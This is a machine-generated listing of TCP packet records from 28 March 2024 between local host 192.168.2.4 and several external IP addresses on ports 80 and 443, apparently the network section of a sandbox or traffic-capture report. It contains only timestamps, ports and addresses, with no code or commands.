Mar 28, 2024 09:14:59.820240021 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.820244074 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820256948 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.820277929 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820286036 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.820291042 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820312977 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.820334911 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820343971 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.820350885 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820370913 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.820388079 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.820413113 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820425034 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820436954 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820446968 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.820466995 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.820476055 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820518017 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.820528030 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820542097 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820554018 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820566893 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820585012 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.820595026 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820606947 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820619106 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.820631027 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820641041 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.820667028 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.820674896 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820688009 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820699930 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820724010 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.820749998 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.820768118 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820780039 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820792913 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820810080 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820825100 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.820836067 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820857048 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.820878029 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.820893049 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820907116 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820919037 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820931911 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.820941925 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820955992 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820964098 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.820966959 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820991039 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821011066 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821033001 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821046114 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821069002 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821082115 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821090937 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821113110 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821130037 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821130037 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821151972 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821175098 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821192026 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821204901 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821216106 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821234941 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821264982 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821268082 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821276903 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821306944 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821305990 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821320057 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821329117 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821331024 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821348906 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821363926 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821383953 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821389914 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821430922 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821438074 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821506023 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821517944 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821530104 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821547031 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821568012 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821579933 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821583033 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821600914 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821604013 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821624994 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821640015 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821647882 CET	443	49767	172.67.218.160	192.168.2.4
Mar 28, 2024 09:14:59.821650028 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821669102 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821707964 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821726084 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821734905 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821749926 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821759939 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821765900 CET	49767	443	192.168.2.4	172.67.218.160
Mar 28, 2024 09:14:59.821783066 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821784973 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821822882 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821844101 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821855068 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821868896 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821892023 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821922064 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821924925 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821937084 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821949005 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.821970940 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.821993113 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822005033 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822005033 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.822026014 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.822038889 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.822063923 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.822072983 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.822088003 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822104931 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.822129965 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822129965 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.822161913 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822175026 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822201967 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.822202921 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822227955 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.822242022 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822254896 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822266102 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.822288036 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.822297096 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822331905 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822336912 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.822346926 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822359085 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822367907 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.822388887 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.822390079 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822412968 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822413921 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.822439909 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.822449923 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822462082 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.822482109 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.822504997 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822518110 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822540998 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.822562933 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822568893 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.822576046 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822587967 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822597980 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.822618961 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822622061 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.822640896 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.822659969 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.822674990 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822688103 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822700024 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822711945 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822717905 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.822738886 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.822753906 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.822779894 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.822803974 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822839022 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.822843075 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.822861910 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822875977 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822887897 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822911978 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.822941065 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.822956085 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.822968960 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.823007107 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.823029041 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.823040962 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.823067904 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.823079109 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.823101997 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.823111057 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.823128939 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.823143005 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.823149920 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.823154926 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.823165894 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.823187113 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.823188066 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.823224068 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.823296070 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.823327065 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.823335886 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.823359966 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.823432922 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.823467970 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.823497057 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.823532104 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.823565006 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.823610067 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.823673010 CET	443	49766	104.21.82.182	192.168.2.4
Mar 28, 2024 09:14:59.823677063 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.823689938 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.823734045 CET	49766	443	192.168.2.4	104.21.82.182
Mar 28, 2024 09:14:59.823740005 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.823751926 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.823751926 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.823784113 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.823786974 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.823800087 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.823832989 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.823853016 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.823892117 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.823910952 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.823934078 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.823940039 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.823971987 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.823975086 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.824012041 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.824017048 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.824043036 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.824078083 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.824090004 CET	49772	443	192.168.2.4	104.21.42.248
Mar 28, 2024 09:14:59.824095011 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.824109077 CET	443	49772	104.21.42.248	192.168.2.4
Mar 28, 2024 09:14:59.824110031 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.824124098 CET	80	49762	45.130.41.108	192.168.2.4
Mar 28, 2024 09:14:59.824158907 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.824173927 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.824198008 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.824237108 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.824243069 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.824268103 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.824305058 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.824306011 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.824331045 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.824350119 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.824373960 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.824383020 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.824405909 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.824414968 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.824440002 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.824453115 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.824477911 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.824490070 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.824512959 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.824521065 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.824533939 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.824570894 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.824579000 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.824630022 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.824644089 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.824655056 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.824666977 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.824682951 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.824698925 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.824717045 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.824723959 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.824734926 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.824755907 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.826486111 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.826544046 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.826549053 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.826586008 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.826925993 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.826966047 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.826989889 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.827028990 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.827312946 CET	80	49768	45.130.41.108	192.168.2.4
Mar 28, 2024 09:14:59.827402115 CET	49768	80	192.168.2.4	45.130.41.108
Mar 28, 2024 09:14:59.828856945 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.828870058 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.828907013 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.828929901 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.829344034 CET	49768	80	192.168.2.4	45.130.41.108
Mar 28, 2024 09:14:59.829648972 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.829662085 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.829705000 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.830485106 CET	49773	443	192.168.2.4	45.130.41.108
Mar 28, 2024 09:14:59.830509901 CET	443	49773	45.130.41.108	192.168.2.4
Mar 28, 2024 09:14:59.830563068 CET	49773	443	192.168.2.4	45.130.41.108
Mar 28, 2024 09:14:59.831505060 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.831517935 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.831545115 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.831568956 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.831608057 CET	49773	443	192.168.2.4	45.130.41.108
Mar 28, 2024 09:14:59.831625938 CET	443	49773	45.130.41.108	192.168.2.4
Mar 28, 2024 09:14:59.833065987 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.833079100 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.833141088 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.834136963 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.834155083 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.834192038 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.834228039 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.834976912 CET	49767	443	192.168.2.4	172.67.218.160
Mar 28, 2024 09:14:59.834985971 CET	443	49767	172.67.218.160	192.168.2.4
Mar 28, 2024 09:14:59.835285902 CET	443	49767	172.67.218.160	192.168.2.4
Mar 28, 2024 09:14:59.835287094 CET	49766	443	192.168.2.4	104.21.82.182
Mar 28, 2024 09:14:59.835300922 CET	443	49766	104.21.82.182	192.168.2.4
Mar 28, 2024 09:14:59.835346937 CET	49767	443	192.168.2.4	172.67.218.160
Mar 28, 2024 09:14:59.835602045 CET	443	49766	104.21.82.182	192.168.2.4
Mar 28, 2024 09:14:59.835658073 CET	49766	443	192.168.2.4	104.21.82.182
Mar 28, 2024 09:14:59.835724115 CET	49767	443	192.168.2.4	172.67.218.160
Mar 28, 2024 09:14:59.835922956 CET	49766	443	192.168.2.4	104.21.82.182
Mar 28, 2024 09:14:59.836452961 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.836469889 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.836509943 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.836528063 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.836776972 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.836811066 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.836824894 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.836848021 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.839467049 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.839484930 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.839534044 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.839555979 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.839728117 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.839742899 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.839787960 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.842096090 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.842114925 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.842161894 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.843031883 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.843048096 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.843082905 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.843106031 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.844667912 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.844685078 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.844707012 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.844728947 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.846266985 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.846285105 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.846309900 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.846334934 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.847246885 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.847260952 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.847307920 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.849514961 CET	80	49735	5.42.66.22	192.168.2.4
